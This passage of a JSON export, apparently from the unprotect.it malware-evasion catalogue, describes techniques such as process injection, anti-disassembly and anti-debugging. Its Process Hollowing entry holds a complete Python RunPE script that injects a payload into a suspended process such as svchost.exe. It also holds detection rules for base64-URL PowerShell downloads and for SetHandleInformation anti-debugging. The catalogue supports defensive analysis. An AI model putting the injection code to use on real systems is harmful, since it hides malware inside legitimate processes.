                    "rule": "title: Powershell download file from base64 url\r\nstatus: experimental\r\ndescription: Powershell download file from base64 url\r\nauthor: Joe Security\r\ndate: 2020-04-13\r\nid: 200072\r\nthreatname:\r\nbehaviorgroup: 1\r\nclassification: 8\r\nmitreattack:\r\n\r\nlogsource:\r\n      category: process_creation\r\n      product: windows\r\ndetection:\r\n      selection:\r\n          CommandLine:\r\n              - '*.downloadfile([system.text.encoding]::ascii.getstring([system.convert]::frombase64string(*'\r\n      condition: selection\r\nlevel: critical"
                }
            ]
        },
        {
            "name": "XOR Operation",
            "category": [
                "https://search.unprotect.it/api/categories/7/"
            ],
            "description": "The XOR operation is the most common use by malware. This is because it is really easy to use for hiding data. Basically a key is used and create the cipher text. XOR is a reversible function that means it uses the same function to encode and decode.",
            "resources": "https://isc.sans.edu/forums/diary/Malware+and+XOR+Part+1/22486/",
            "tags": "xor",
            "snippets": [],
            "detection_rules": []
        },
        {
            "name": "FIleless Mechanisms",
            "category": [
                "https://search.unprotect.it/api/categories/4/"
            ],
            "description": "Some malware are downloaded and run into the memory without write any file into the disk. This kind of malware is called \"Fileless\"",
            "resources": "https://blog.minerva-labs.com/deconstructing-fileless-attacks-into-4-underlying-techniques",
            "tags": "fileless",
            "snippets": [],
            "detection_rules": []
        },
        {
            "name": "DLL Injection via CreateRemoteThread and LoadLibrary",
            "category": [
                "https://search.unprotect.it/api/categories/4/"
            ],
            "description": "Similar to a hook injection a process can insert a malicious DLL to be use by the system. This technique is one of the most common techniques used to inject malware into another process. The malware writes the path to its malicious dynamic-link library (DLL) in the virtual address space of another process, and ensures the remote process loads it by creating a remote thread in the target process.",
            "resources": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process",
            "tags": "",
            "snippets": [],
            "detection_rules": []
        },
        {
            "name": "Hook Injection",
            "category": [
                "https://search.unprotect.it/api/categories/4/"
            ],
            "description": "A hook is basically a technique to alter the behaviour of an internal function of an operating system or an application. Malware are able to insert malicious function to be use by another process.",
            "resources": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process",
            "tags": "",
            "snippets": [],
            "detection_rules": []
        },
        {
            "name": "Entry Point Modification",
            "category": [
                "https://search.unprotect.it/api/categories/4/"
            ],
            "description": "The entry point is the beginning of the exe file during execution. Some techniques change or relocate the real entry point to protect the code from analysis.",
            "resources": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/expiro-infects-encrypts-files-to-complicate-repair/",
            "tags": "EP",
            "snippets": [],
            "detection_rules": []
        },
        {
            "name": "Parent Process Detection",
            "category": [
                "https://search.unprotect.it/api/categories/6/"
            ],
            "description": "Parent process is a basic technique that consists to detect the parent process of the current process. Most of the user processes have as a parent explorer.exe, a simple way consist to check is the parent process is this one.",
            "resources": "https://cysinfo.com/detecting-malicious-processes-psinfo-volatility-plugin/",
            "tags": "",
            "snippets": [],
            "detection_rules": []
        },
        {
            "name": "Process Camouflage, Masquerading",
            "category": [
                "https://search.unprotect.it/api/categories/4/"
            ],
            "description": "Masquerading is a basic concept that consist to rename the malicious file by a legitimate file (e.g: svchost.exe) and copy to a legitimate folder. Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. Several different variations of this technique have been observed.",
            "resources": "https://www.endgame.com/blog/technical-blog/how-hunt-masquerade-ball",
            "tags": "",
            "snippets": [],
            "detection_rules": []
        },
        {
            "name": "Process Hollowing, RunPE",
            "category": [
                "https://search.unprotect.it/api/categories/4/"
            ],
            "description": "Process hollowing is a technique uses by malware to inject a malicious code into another process. For example a sample can create a notepad.exe process and inject its payload.\r\n\r\nThe process is the following:\r\n\r\n* `CreateProcess`: in a suspended mode with the CreationFlag at 0x0000 0004.\r\n* `GetThreadContext`: retrieves the context of the specified thread.\r\n* `ZwUnmapViewOfSection`: Unmaps a view of a section from the virtual address space of a\r\nsubject process.\r\n* `VirtualAllocEx`: allocates memory within the suspended process’s address space.\r\n* `WriteProcessMemory`: writes data of the PE file into the memory just allocated within the\r\nsuspended process.\r\n* `SetThreadContext`: sets the EAX register to the entry point of the executable written.\r\n* `ResumeThread`: resumes the thread of the suspended process.",
            "resources": "https://www.blackhat.com/docs/asia-17/materials/asia-17-KA-What-Malware-Authors-Don't-Want-You-To-Know-Evasive-Hollow-Process-Injection-wp.pdf\r\nhttps://speakerdeck.com/fr0gger/teslacrypt-ransomware-analysis",
            "tags": "RunPE",
            "snippets": [
                {
                    "language": "https://search.unprotect.it/api/snippet_languages/3/",
                    "author": "https://search.unprotect.it/api/snippet_authors/3/",
                    "technique": "https://search.unprotect.it/api/techniques/88/",
                    "description": "",
                    "plain_code": "# Source: https://github.com/joren485/HollowProcess\r\nfrom ctypes import *\r\nfrom pefile import PE\r\nimport sys\r\n\r\nif len(sys.argv) != 3:\r\n        print \"Example: runpe.py test.exe C:\\windows\\system32\\svchost.exe\"\r\n        sys.exit()\r\n\r\n\r\npayload_exe = sys.argv[1]\r\ntarget_exe = sys.argv[2]\r\nstepcount = 1\r\n\r\n\r\nclass PROCESS_INFORMATION(Structure):\r\n\t_fields_ = [\r\n                ('hProcess', c_void_p), \r\n                ('hThread', c_void_p), \r\n                ('dwProcessId', c_ulong), \r\n                ('dwThreadId', c_ulong)]\r\n\t\r\nclass STARTUPINFO(Structure):\r\n\t_fields_ = [\r\n                ('cb', c_ulong), \r\n                ('lpReserved', c_char_p),    \r\n                ('lpDesktop', c_char_p),\r\n                ('lpTitle', c_char_p),\r\n                ('dwX', c_ulong),\r\n                ('dwY', c_ulong),\r\n                ('dwXSize', c_ulong),\r\n                ('dwYSize', c_ulong),\r\n                ('dwXCountChars', c_ulong),\r\n                ('dwYCountChars', c_ulong),\r\n                ('dwFillAttribute', c_ulong),\r\n                ('dwFlags', c_ulong),\r\n                ('wShowWindow', c_ushort),\r\n                ('cbReserved2', c_ushort),\r\n                ('lpReserved2', c_ulong),    \r\n                ('hStdInput', c_void_p),\r\n                ('hStdOutput', c_void_p),\r\n                ('hStdError', c_void_p)]\r\n\t\r\nclass FLOATING_SAVE_AREA(Structure):\r\n\t_fields_ = [\r\n                (\"ControlWord\", c_ulong),\r\n                (\"StatusWord\", c_ulong),\r\n                (\"TagWord\", c_ulong),\r\n                (\"ErrorOffset\", c_ulong),\r\n                (\"ErrorSelector\", c_ulong),\r\n                (\"DataOffset\", c_ulong),\r\n                (\"DataSelector\", c_ulong),\r\n                (\"RegisterArea\", c_ubyte * 80),\r\n                (\"Cr0NpxState\", c_ulong)]\t\r\n\t\r\nclass CONTEXT(Structure):\r\n        _fields_ = [\r\n                (\"ContextFlags\", c_ulong),\r\n                (\"Dr0\", c_ulong),\r\n                (\"Dr1\", c_ulong),\r\n                (\"Dr2\", c_ulong),\r\n                (\"Dr3\", c_ulong),\r\n                (\"Dr6\", c_ulong),\r\n                (\"Dr7\", c_ulong),\r\n                (\"FloatSave\", FLOATING_SAVE_AREA),\r\n                (\"SegGs\", c_ulong),\r\n                (\"SegFs\", c_ulong),\r\n                (\"SegEs\", c_ulong),\r\n                (\"SegDs\", c_ulong),\r\n                (\"Edi\", c_ulong),\r\n                (\"Esi\", c_ulong),\r\n                (\"Ebx\", c_ulong),\r\n                (\"Edx\", c_ulong),\r\n                (\"Ecx\", c_ulong),\r\n                (\"Eax\", c_ulong),\r\n                (\"Ebp\", c_ulong),\r\n                (\"Eip\", c_ulong),\r\n                (\"SegCs\", c_ulong),\r\n                (\"EFlags\", c_ulong),\r\n                (\"Esp\", c_ulong),\r\n                (\"SegSs\", c_ulong),\r\n                (\"ExtendedRegisters\", c_ubyte * 512)]\r\n\r\ndef error():\r\n        print \"[!]Error: \" + FormatError(GetLastError())\r\n        print \"[!]Exiting\"\r\n        print \"[!]The process may still be running\"\r\n        sys.exit()\r\n        \r\n\r\nprint \"[\" + str(stepcount) +\"]Creating Suspended Process\"\r\nstepcount += 1\r\n\r\nstartupinfo = STARTUPINFO()\r\nstartupinfo.cb = sizeof(STARTUPINFO)\r\nprocessinfo = PROCESS_INFORMATION()\r\n\r\nCREATE_SUSPENDED = 0x0004\r\nif windll.kernel32.CreateProcessA(\r\n                                None,\r\n                                target_exe,\r\n                                None,\r\n                                None,\r\n                                False,\r\n                                CREATE_SUSPENDED,\r\n                                None,\r\n                                None,\r\n                                byref(startupinfo),\r\n                                byref(processinfo)) == 0:\r\n       error()\r\n        \r\n\r\nhProcess = processinfo.hProcess\r\nhThread = processinfo.hThread\r\n\r\n\r\nprint \"\\t[+]Successfully created suspended process! PID: \" + str(processinfo.dwProcessId)\r\nprint\r\nprint \"[\" + str(stepcount) +\"]Reading Payload PE file\"\r\nstepcount += 1\r\n\r\nFile = open(payload_exe,\"rb\")\r\npayload_data = File.read()\r\nFile.close()\r\npayload_size = len(payload_data)\r\n\r\nprint \"\\t[+]Payload size: \" + str(payload_size)\r\nprint\r\nprint \"[\" + str(stepcount) +\"]Extracting the necessary info from the payload data.\"\r\nstepcount += 1\r\n\r\npayload = PE(data = payload_data)\r\npayload_ImageBase = payload.OPTIONAL_HEADER.ImageBase\r\npayload_SizeOfImage = payload.OPTIONAL_HEADER.SizeOfImage\r\npayload_SizeOfHeaders = payload.OPTIONAL_HEADER.SizeOfHeaders\r\npayload_sections = payload.sections\r\npayload_NumberOfSections = payload.FILE_HEADER.NumberOfSections\r\npayload_AddressOfEntryPoint = payload.OPTIONAL_HEADER.AddressOfEntryPoint\r\npayload.close()\r\n\r\nMEM_COMMIT = 0x1000\r\nMEM_RESERVE = 0x2000\r\nPAGE_READWRITE = 0x4\r\n\r\npayload_data_pointer = windll.kernel32.VirtualAlloc(None,\r\n                                c_int(payload_size+1),\r\n                                MEM_COMMIT | MEM_RESERVE,\r\n                                PAGE_READWRITE)\r\n\r\n\r\nmemmove(                        payload_data_pointer,\r\n                                payload_data,\r\n                                payload_size)\r\n\r\nprint \"\\t[+]Data from the PE Header: \"\r\nprint \"\\t[+]Image Base Address: \" + str(hex(payload_ImageBase))\r\nprint \"\\t[+]Address of EntryPoint: \" + str(hex(payload_AddressOfEntryPoint))\r\nprint \"\\t[+]Size of Image: \" + str(payload_SizeOfImage)\r\nprint \"\\t[+]Pointer to data: \" + str(hex(payload_data_pointer))\r\n\r\n\r\nprint\r\nprint \"[\" + str(stepcount) +\"]Getting Context\"\r\ncx = CONTEXT()\r\ncx.ContextFlags = 0x10007\r\n\r\nif windll.kernel32.GetThreadContext(hThread, byref(cx)) == 0:\r\n         error()\r\nprint\r\nprint \"[\" + str(stepcount) +\"]Getting Image Base Address from target\"\r\nstepcount += 1\r\n\r\nbase = c_int(0)\r\nwindll.kernel32.ReadProcessMemory(hProcess, c_char_p(cx.Ebx+8), byref(base), sizeof(c_void_p),None)\r\ntarget_PEBaddress = base\r\nprint \"\\t[+]PEB address: \" + str(hex(target_PEBaddress.value))\r\n\r\n\r\nprint\r\nprint \"[\" + str(stepcount) +\"]Unmapping\"\r\nif target_PEBaddress ==  payload_ImageBase:\r\n        if not windll.ntdll.NtUnmapViewOfSection(\r\n                                hProcess,\r\n                                target_ImageBase):\r\n                error()\r\n\r\nprint\r\nprint \"[\" + str(stepcount) +\"]Allocation memory\"\r\nstepcount += 1\r\n\r\nMEM_COMMIT = 0x1000\r\nMEM_RESERVE = 0x2000\r\nPAGE_EXECUTE_READWRITE = 0x40\r\n\r\naddress = windll.kernel32.VirtualAllocEx(\r\n                                hProcess, \r\n                                c_char_p(payload_ImageBase), \r\n                                c_int(payload_SizeOfImage), \r\n                                MEM_COMMIT|MEM_RESERVE, \r\n                                PAGE_EXECUTE_READWRITE)\r\n\r\nif address == 0:\r\n        error()\r\n\r\nprint \"\\t[+]Allocated to: \"+ str(hex(address))\r\n\r\nprint\r\nprint \"[\" + str(stepcount) +\"]Writing Headers\"\r\nstepcount += 1\r\n\r\nlpNumberOfBytesWritten = c_size_t(0)\r\n\r\nif windll.kernel32.WriteProcessMemory(\r\n                                hProcess,\r\n                                c_char_p(payload_ImageBase),\r\n                                c_char_p(payload_data_pointer),\r\n                                c_int(payload_SizeOfHeaders),\r\n                                byref(lpNumberOfBytesWritten)) == 0:\r\n                error()\r\n\r\nprint \"\\t[+]Bytes written:\", lpNumberOfBytesWritten.value\r\nprint \"\\t[+]Pointer to data: \" + str(hex(payload_ImageBase))\r\nprint \"\\t[+]Writing to: \" + str(hex(payload_data_pointer))\r\nprint \"\\t[+]Size of data: \" + str(hex(payload_SizeOfHeaders))\r\n\r\nprint\r\nfor i in range(payload_NumberOfSections):\r\n        section = payload_sections[i]\r\n        dst = payload_ImageBase + section.VirtualAddress\r\n        src = payload_data_pointer + section.PointerToRawData\r\n        size = section.SizeOfRawData\r\n        print\r\n        print \"[\" + str(stepcount) +\"]Writing section: \" + section.Name\r\n        stepcount += 1\r\n        print \"\\t[+]Pointer to data: \" + str(hex(src))\r\n        print \"\\t[+]Writing to: \" + str(hex(dst))\r\n        print \"\\t[+]Size of data: \" + str(hex(size))\r\n\r\n        lpNumberOfBytesWritten  = c_size_t(0)\r\n\r\n        if windll.kernel32.WriteProcessMemory(\r\n                                hProcess,\r\n                                c_char_p(dst),\r\n                                c_char_p(src),\r\n                                c_int(size),\r\n                                byref(lpNumberOfBytesWritten)) == 0:\r\n                 error()\r\n                 \r\n        print \"\\t[+]Bytes written:\", lpNumberOfBytesWritten.value\r\n         \r\nprint\r\nprint \"[\" + str(stepcount) +\"]Editing Context\"\r\nstepcount += 1\r\n\r\ncx.Eax = payload_ImageBase + payload_AddressOfEntryPoint\r\n\r\nlpNumberOfBytesWritten  = c_size_t(0)\r\nif windll.kernel32.WriteProcessMemory(\r\n                                hProcess,\r\n                                c_char_p(cx.Ebx+8),\r\n                                c_char_p(payload_data_pointer+0x11C),\r\n                                c_int(4),\r\n                                byref(lpNumberOfBytesWritten)) == 0:\r\n         error()\r\n\r\nprint \"\\t[+]Pointer to data: \" + str(hex(cx.Ebx+8))\r\nprint \"\\t[+]Writing to: \" + str(hex(payload_data_pointer+0x11C))\r\nprint \"\\t[+]Size of data: \" + str(hex(4))\r\nprint \"\\t[+]Bytes written:\", lpNumberOfBytesWritten.value\r\n\r\nprint \r\nprint \"[\" + str(stepcount) +\"]Setting Context\"\r\nstepcount += 1\r\n\r\nwindll.kernel32.SetThreadContext(\r\n                                hThread,\r\n                                byref(cx))\r\n\r\nprint\r\nprint \"[\" + str(stepcount) +\"]Resuming Thread\"\r\nstepcount += 1\r\n\r\nif windll.kernel32.ResumeThread(hThread) == 0:\r\n        error()\r\n\r\nprint \"[\" + str(stepcount) +\"]Success\""
                }
            ],
            "detection_rules": []
        },
        {
            "name": "Disassembly Desynchronization",
            "category": [
                "https://search.unprotect.it/api/categories/5/"
            ],
            "description": "This technique involves the creative use of instructions and data to prevent the disassembly from finding the correct starting address for one or more instructions. Disassembly desynchronization is a well-known anti-disassembly technique used to induce incorrect disassembly.",
            "resources": "https://github.com/yellowbyte/analysis-of-anti-analysis/blob/master/research/the_return_of_disassembly_desynchronization/the_return_of_disassembly_desynchronization.md",
            "tags": "",
            "snippets": [],
            "detection_rules": []
        },
        {
            "name": "Dynamically Computed Target Address",
            "category": [
                "https://search.unprotect.it/api/categories/5/"
            ],
            "description": "In some case the resolved target address can be uninitialised. This may happen if the snapshot is taken at a point during the execution when the resolution of the API has not taken place in the malware code.",
            "resources": "https://books.google.fr/books?id=3nPAM3AZ1foC&pg=PA436&lpg=PA436&dq=dynamically+computed+target+address&source=bl&ots=Nm7aJXEhDp&sig=ACfU3U2X1g6CTacHMZ3AH1kyk0XBDRUiQA&hl=en&sa=X&ved=2ahUKEwi5wbKV-pXhAhUPy4UKHS1xAdAQ6AEwAHoECAYQAQ#v=onepage&q=dynamically%20computed%20target%20address&f=false",
            "tags": "",
            "snippets": [],
            "detection_rules": []
        },
        {
            "name": "Opcode Obfuscation",
            "category": [
                "https://search.unprotect.it/api/categories/5/"
            ],
            "description": "An opcode is a machine language instruction that specifies the operation to be performed. Some of this instruction can be obfuscated by a malware in order to dissimulate the real behaviour.",
            "resources": "https://en.wikibooks.org/wiki/X86_Disassembly/Code_Obfuscation",
            "tags": "",
            "snippets": [],
            "detection_rules": []
        },
        {
            "name": "Jump With Same Target",
            "category": [
                "https://search.unprotect.it/api/categories/5/"
            ],
            "description": "This technique is a back-to-back conditional jump instructions that both point to the same target. If a jz loc_512 is followed by jnz loc_512, the location loc_512 will always be jumped to. The combination of jz with jnz is, in effect, an unconditional jmp, but the disassembler doesn’t recognize it as such because it only disassembles one instruction at a time.",
            "resources": "https://www.malwinator.com/2015/11/22/anti-disassembly-used-in-malware-a-primer/",
            "tags": "",
            "snippets": [],
            "detection_rules": []
        },
        {
            "name": "Impossible Disassembly",
            "category": [
                "https://search.unprotect.it/api/categories/5/"
            ],
            "description": "By using a data byte placed strategically after a conditional jump instruction, with the idea that disassembly starting at this byte will prevent the real instruction that follows from being disassembled because the byte that inserted is the opcode for a multibyte instruction.",
            "resources": "https://www.slideshare.net/SamBowne/practical-malware-analysis-ch-15-antidisassembly",
            "tags": "",
            "snippets": [],
            "detection_rules": []
        },
        {
            "name": "Obscuring Control Flow",
            "category": [
                "https://search.unprotect.it/api/categories/5/"
            ],
            "description": "The Structure Exception Handling (SEH) provides a method of flow control that is unable to be followed by disassemblers and will fool debuggers.",
            "resources": "https://www.malwinator.com/2015/11/27/anti-disassembly-techniques-used-by-malware-a-primer-part-2/",
            "tags": "SEH",
            "snippets": [],
            "detection_rules": []
        },
        {
            "name": "Abusing the Return Pointer",
            "category": [
                "https://search.unprotect.it/api/categories/5/"
            ],
            "description": "A RETN instruction is normally use to return from a function call. But if the RETN instruction is used for another purpose the disassembler will prematurely terminate the function.",
            "resources": "https://www.malwinator.com/2015/11/27/anti-disassembly-techniques-used-by-malware-a-primer-part-2/",
            "tags": "retn",
            "snippets": [],
            "detection_rules": []
        },
        {
            "name": "Obscuring Control Flow 2",
            "category": [
                "https://search.unprotect.it/api/categories/5/"
            ],
            "description": "Pointers are a common programming idiom use by C and C++. This functionality can be an issue for the disassembler if a huge amount of pointer is used into the code. The result can be difficult without dynamic analysis.",
            "resources": "http://staff.ustc.edu.cn/~bjhua/courses/security/2014/readings/anti-disas.pdf",
            "tags": "",
            "snippets": [],
            "detection_rules": []
        },
        {
            "name": "Spaghetti, Junk Code",
            "category": [
                "https://search.unprotect.it/api/categories/5/"
            ],
            "description": "Junk code can be inserted without modification to the original code, the junk code will not affect the program but will add instruction into it. The result will be a huge amount of junk instruction into the disassembler that will add a difficulty during analysis.\r\n\r\nSimilar to junk code, the spaghetti code will draw an instruction flow that looks like to spaghetti.",
            "resources": "https://en.wikipedia.org/wiki/Spaghetti_code\r\nhttps://www.nozominetworks.com/blog/greyenergy-malware-research-paper-maldoc-to-backdoor/",
            "tags": "",
            "snippets": [],
            "detection_rules": []
        },
        {
            "name": "Control Flow Graph Flattening",
            "category": [
                "https://search.unprotect.it/api/categories/5/"
            ],
            "description": "The Control Flow Graph flattening of a program consists in flattening the control flow of each function by first breaking up the nesting of loops and if-statements, and then hiding each of them in a case of a large switch statement, that is wrapped inside the body of a loop.",
            "resources": "http://ac.inf.elte.hu/Vol_030_2009/003.pdf",
            "tags": "",
            "snippets": [],
            "detection_rules": []
        },
        {
            "name": "API Obfuscation",
            "category": [
                "https://search.unprotect.it/api/categories/5/"
            ],
            "description": "API obfuscation is a technique use by malware to avoid analysis. Once reversed, the disassembler tool has the capabilities to print the API. If API obfuscation is used a CALL without the name of the function will be printed into the disassembler tool.",
            "resources": "https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/security-response-museum-API-win32-09-en.pdf",
            "tags": "",
            "snippets": [],
            "detection_rules": []
        },
        {
            "name": "INT3 Instruction Scanning",
            "category": [
                "https://search.unprotect.it/api/categories/3/"
            ],
            "description": "Software breakpoints are breakpoints which are set by modifying the code at the target address, replacing it with a byte value 0xCC (INT3 / Breakpoint Interrupt). Malware identify software breakpoints by scanning for the byte 0xCC in the protector code and/or an API code.",
            "resources": "https://www.blackhat.com/presentations/bh-usa-07/Quist_and_Valsmith/Whitepaper/bh-usa-07-quist_and_valsmith-WP.pdf",
            "tags": "",
            "snippets": [],
            "detection_rules": []
        },
        {
            "name": "Interrupts",
            "category": [
                "https://search.unprotect.it/api/categories/3/"
            ],
            "description": "Most exception-based detection relies on the fact that debuggers will trap the exception and not immediately pass it to the process being debugged for handling. The default setting on most debuggers is to trap exceptions and not pass them to the program. If the debugger doesn’t pass the exception to the process properly, that failure can be detected within the process exception-handling mechanism.",
            "resources": "http://www.autosectools.com/anti-debugging-with-exceptions.pdf",
            "tags": "",
            "snippets": [],
            "detection_rules": []
        },
        {
            "name": "Performing Code Checksum",
            "category": [
                "https://search.unprotect.it/api/categories/3/"
            ],
            "description": "Performing code checksum tries to identify if a part of the packer code had been modified which suggests that anti-debugging routines may had been disabled.",
            "resources": "https://www.apriorit.com/dev-blog/367-anti-reverse-engineering-protection-techniques-to-use-before-releasing-software",
            "tags": "",
            "snippets": [],
            "detection_rules": []
        },
        {
            "name": "Unhandled Exception Filter",
            "category": [
                "https://search.unprotect.it/api/categories/3/"
            ],
            "description": "An application-defined function that passes unhandled exceptions to the debugger, if the process is being debugged. Otherwise, it optionally displays an application arror message box and causes the exception handler to be executed.",
            "resources": "https://evilcodecave.wordpress.com/2008/07/24/setunhandledexception-filter-anti-debug-trick/",
            "tags": "",
            "snippets": [],
            "detection_rules": [
                {
                    "type": "https://search.unprotect.it/api/detection_rule_categories/2/",
                    "name": "SetHandleInformation",
                    "rule": "rule:\r\n  meta:\r\n    name: check for protected handle exception\r\n    namespace: anti-analysis/anti-debugging/debugger-detection\r\n    author: michael.hunhoff@fireeye.com\r\n    scope: function\r\n    mbc:\r\n      - Anti-Behavioral Analysis::Debugger Detection::SetHandleInformation [B0001.024]\r\n    references:\r\n      - https://github.com/LordNoteworthy/al-khaser/blob/master/al-khaser/AntiDebug/SetHandleInformation_API.cpp\r\n    examples:\r\n      - al-khaser_x86.exe_:0x430D20\r\n  features:\r\n    - and:\r\n      - basic block:\r\n        - and:\r\n          - count(number(2)): 2 or more\r\n          - api: SetHandleInformation\r\n      - api: CloseHandle"
                }
            ]
        },
        {
            "name": "Bad String Format",
            "category": [
                "https://search.unprotect.it/api/categories/3/"
            ],
            "description": "This can be used to exploit weaknesses about debugger. OllyDbg had known bug of not correct handling of format strings and crashed with multiple %s input.",
            "resources": "http://www.openrce.org/reference_library/anti_reversing_view/8/OllyDbg%20Filename%20Format%20String/",
            "tags": "",
            "snippets": [],
            "detection_rules": []
        }
    ]
}